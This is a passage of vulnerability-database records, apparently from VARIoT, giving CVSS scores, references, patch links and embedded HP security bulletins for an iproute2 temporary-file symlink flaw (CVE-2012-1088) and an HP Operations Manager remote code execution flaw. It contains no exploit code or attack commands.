            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.4,
            "id": "VHN-54369",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:N/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.4,
            "id": "CVE-2012-1088",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "LOW",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2012-1088",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201202-497",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-54369",
            "trust": 0.1,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2012-1088",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-54369"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-1088"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-006150"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201202-497"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-1088"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "iproute2 before 3.3.0 allows local users to overwrite arbitrary files via a symlink attack on a temporary file used by (1) configure or (2) examples/dhcp-client-script. Linux Kernel is prone to multiple insecure temporary file-creation vulnerabilities in the \u0027iproute\u0027 package. \nAn attacker with local access could potentially exploit these issues to perform symbolic-link attacks. \nSuccessfully mounting a symbolic attack may allow the attacker to delete or modify sensitive files. Other attacks may also be possible. iproute2 is a series of toolkits for traffic control on TCP/IP networks in Linux systems maintained by American software developer Stephen Hemminger. The toolkit includes the following components, ifconfig, route, tc, ip. A security vulnerability exists in iproute2 3.2.0 and earlier versions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04135307\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04135307\nVersion: 1\n\nHPSBGN02970 rev.1 - HP Rapid Deployment Pack (RDP) or HP Insight Control\nServer Deployment, Multiple Remote Vulnerabilities affecting Confidentiality,\nIntegrity and Availability\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-03-10\nLast Updated: 2014-03-10\n\nPotential Security Impact: Multiple remote vulnerabilities affecting\nconfidentiality, integrity and availability\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified with HP Rapid Deployment Pack\n(RDP) or HP Insight Control Server Deployment. The vulnerabilities could be\nexploited remotely affecting confidentiality, integrity and availability. \n\nReferences: CVE-2010-4008\n CVE-2010-4494\n CVE-2011-2182\n CVE-2011-2213\n CVE-2011-2492\n\nCVE-2011-2518\n CVE-2011-2689\n CVE-2011-2723\n CVE-2011-3188\n CVE-2011-4077\n\nCVE-2011-4110\n CVE-2012-0058\n CVE-2012-0879\n CVE-2012-1088\n CVE-2012-1179\n\nCVE-2012-2137\n CVE-2012-2313\n CVE-2012-2372\n CVE-2012-2373\n CVE-2012-2375\n\nCVE-2012-2383\n CVE-2012-2384\n CVE-2013-6205\n CVE-2013-6206\n SSRT101443\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP Rapid Deployment Pack (RDP) -- All versions\nHP Insight Control Server Deployment -- All versions\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2013-6205    (AV:L/AC:M/Au:S/C:P/I:P/A:P)        4.1\nCVE-2013-6206    (AV:N/AC:L/Au:N/C:C/I:P/A:P)        9.0\nCVE-2010-4008    (AV:N/AC:M/Au:N/C:N/I:N/A:P)        4.3\nCVE-2010-4494    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2011-2182    (AV:L/AC:L/Au:N/C:C/I:C/A:C)        7.2\nCVE-2011-2213    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2011-2492    (AV:L/AC:M/Au:N/C:P/I:N/A:N)        1.9\nCVE-2011-2518    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2011-2689    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2011-2723    (AV:A/AC:M/Au:N/C:N/I:N/A:C)        5.7\nCVE-2011-3188    (AV:N/AC:M/Au:N/C:P/I:P/A:P)        6.8\nCVE-2011-4077    (AV:L/AC:M/Au:N/C:C/I:C/A:C)        6.9\nCVE-2011-4110    (AV:L/AC:L/Au:N/C:N/I:N/A:P)        2.1\nCVE-2012-0058    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2012-0879    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2012-1088    (AV:L/AC:M/Au:N/C:N/I:P/A:P)        3.3\nCVE-2012-1179    (AV:A/AC:M/Au:S/C:N/I:N/A:C)        5.2\nCVE-2012-2137    (AV:L/AC:M/Au:N/C:C/I:C/A:C)        6.9\nCVE-2012-2313    (AV:L/AC:H/Au:N/C:N/I:N/A:P)        1.2\nCVE-2012-2372    (AV:L/AC:M/Au:S/C:N/I:N/A:C)        4.4\nCVE-2012-2373    (AV:L/AC:H/Au:N/C:N/I:N/A:C)        4.0\nCVE-2012-2375    (AV:A/AC:H/Au:N/C:N/I:N/A:C)        4.6\nCVE-2012-2383    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\nCVE-2012-2384    (AV:L/AC:L/Au:N/C:N/I:N/A:C)        4.9\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP recommends that HP Rapid Deployment Pack (RDP) or HP Insight Control\nServer Deployment should only be run on private secure networks to prevent\nthe risk of security compromise. \n\nHISTORY\nVersion:1 (rev.1) - 10 March 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2.0.19 (GNU/Linux)\n\niEYEARECAAYFAlMd70EACgkQ4B86/C0qfVnXowCgnnw+HySvDNjCV7VPwZHplLwc\nGw4An38h3204bsbLQN/gJQVEqFTo5IfX\n=sWmR\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2012-1088"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-006150"
      },
      {
        "db": "BID",
        "id": "52185"
      },
      {
        "db": "VULHUB",
        "id": "VHN-54369"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-1088"
      },
      {
        "db": "PACKETSTORM",
        "id": "125636"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2012-1088",
        "trust": 3.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-006150",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201202-497",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "52185",
        "trust": 0.4
      },
      {
        "db": "VULHUB",
        "id": "VHN-54369",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-1088",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "125636",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-54369"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-1088"
      },
      {
        "db": "BID",
        "id": "52185"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-006150"
      },
      {
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201202-497"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-1088"
      }
    ]
  },
  "id": "VAR-201402-0055",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-54369"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-02-13T19:32:13.137000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "dhcp-client-script: don\u0027t use /tmp",
        "trust": 0.8,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/commit/?id=20ed7b24df05eadf83168d1d0ce0052a31380928"
      },
      {
        "title": "Don\u0027t put configure files in /tmp",
        "trust": 0.8,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/commit/?id=e557d1ac3a156ba7521ba44b0b412af4542f83f8"
      },
      {
        "title": "Bug 797878",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=797878"
      },
      {
        "title": "iproute2-3.3.0",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=48095"
      },
      {
        "title": "iproute2-3.3.0",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=48094"
      },
      {
        "title": "iproute2-3.3.0",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=48096"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2012-064",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2012-064"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2012-1088"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-006150"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201202-497"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-59",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-54369"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-006150"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-1088"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=797878"
      },
      {
        "trust": 1.8,
        "url": "http://git.kernel.org/?p=linux/kernel/git/shemminger/iproute2.git%3ba=commit%3bh=20ed7b24df05eadf83168d1d0ce0052a31380928"
      },
      {
        "trust": 1.8,
        "url": "http://git.kernel.org/?p=linux/kernel/git/shemminger/iproute2.git%3ba=commit%3bh=e557d1ac3a156ba7521ba44b0b412af4542f83f8"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=139447903326211\u0026w=2"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1088"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1088"
      },
      {
        "trust": 0.3,
        "url": "http://git.kernel.org/?p=linux/kernel/git/shemminger/iproute2.git;a=commitdiff;h=e557d1ac3a156ba7521ba44b0b412af4542f83f8"
      },
      {
        "trust": 0.3,
        "url": "http://git.kernel.org/?p=linux/kernel/git/shemminger/iproute2.git;a=commitdiff;h=20ed7b24df05eadf83168d1d0ce0052a31380928"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04135307"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=139447903326211\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/59.html"
      },
      {
        "trust": 0.1,
        "url": "https://alas.aws.amazon.com/alas-2012-64.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2383"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0879"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0058"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2518"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2137"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2723"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2492"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2689"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2373"
      },
      {
        "trust": 0.1,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4077"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2384"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2375"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4110"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4494"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2182"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3188"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2313"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2372"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2213"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1179"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1088"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-54369"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-1088"
      },
      {
        "db": "BID",
        "id": "52185"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-006150"
      },
      {
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201202-497"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-1088"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-54369"
      },
      {
        "db": "VULMON",
        "id": "CVE-2012-1088"
      },
      {
        "db": "BID",
        "id": "52185"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-006150"
      },
      {
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201202-497"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-1088"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-02-15T00:00:00",
        "db": "VULHUB",
        "id": "VHN-54369"
      },
      {
        "date": "2014-02-15T00:00:00",
        "db": "VULMON",
        "id": "CVE-2012-1088"
      },
      {
        "date": "2012-02-27T00:00:00",
        "db": "BID",
        "id": "52185"
      },
      {
        "date": "2014-02-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-006150"
      },
      {
        "date": "2014-03-11T01:16:40",
        "db": "PACKETSTORM",
        "id": "125636"
      },
      {
        "date": "2012-02-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201202-497"
      },
      {
        "date": "2014-02-15T14:57:07.160000",
        "db": "NVD",
        "id": "CVE-2012-1088"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-54369"
      },
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2012-1088"
      },
      {
        "date": "2015-04-13T21:49:00",
        "db": "BID",
        "id": "52185"
      },
      {
        "date": "2014-02-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2012-006150"
      },
      {
        "date": "2023-02-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201202-497"
      },
      {
        "date": "2023-02-13T04:32:54.550000",
        "db": "NVD",
        "id": "CVE-2012-1088"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "52185"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201202-497"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "iproute2 Vulnerable to overwriting arbitrary files",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-006150"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "post link",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201202-497"
      }
    ],
    "trust": 0.6
  }
}

var-201410-1301
Vulnerability from variot

Unspecified vulnerability in HP Operations Manager 9.10 and 9.11 on UNIX allows remote attackers to execute arbitrary code via unknown vectors. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Few technical details are currently available. We will update this BID as more information emerges. HP Operations Manager 9.10 and 9.11 for UNIX are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04472866

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04472866 Version: 1

HPSBMU03127 rev.1 - HP Operations Manager for UNIX, Remote Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

References: CVE-2014-2648, CVE-2014-2649 (SSRT101727)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The updates can be downloaded from HP Software Support Online (SSO).

9.11.120 server patches: Component Download Location

OMHPUX_00004 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01188205

ITOSOL_00802 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01187924

OML_00080 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01187666

9.11.120 Java UI patches: Component Download Location

OMHPUX_00005 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01187192

ITOSOL_00803 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01187435

OML_00081 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01188103

9.20.300 server patches: Component Download Location

OMHPUX_00006 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01188207

ITOSOL_00804 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01188065

OML_00082 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01188209

HISTORY Version:1 (rev.1) - 8 October 2014 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux)

iEYEARECAAYFAlQ1TwsACgkQ4B86/C0qfVnkJgCfevd5vzwuHkW/C2VigZXMkDx3 emMAoPo5hL+fb0wuvT/65VDTrqjXDEY1 =TbvC -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201410-1301",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "operations manager",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "hp",
        "version": "9.11"
      },
      {
        "model": "operations manager",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "hp",
        "version": "9.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "hp operations manager",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "9.10"
      },
      {
        "model": "hp operations manager",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "9.11"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "70350"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004642"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-190"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2648"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:hp:operations_manager:9.10:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:hp:operations_manager:9.11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
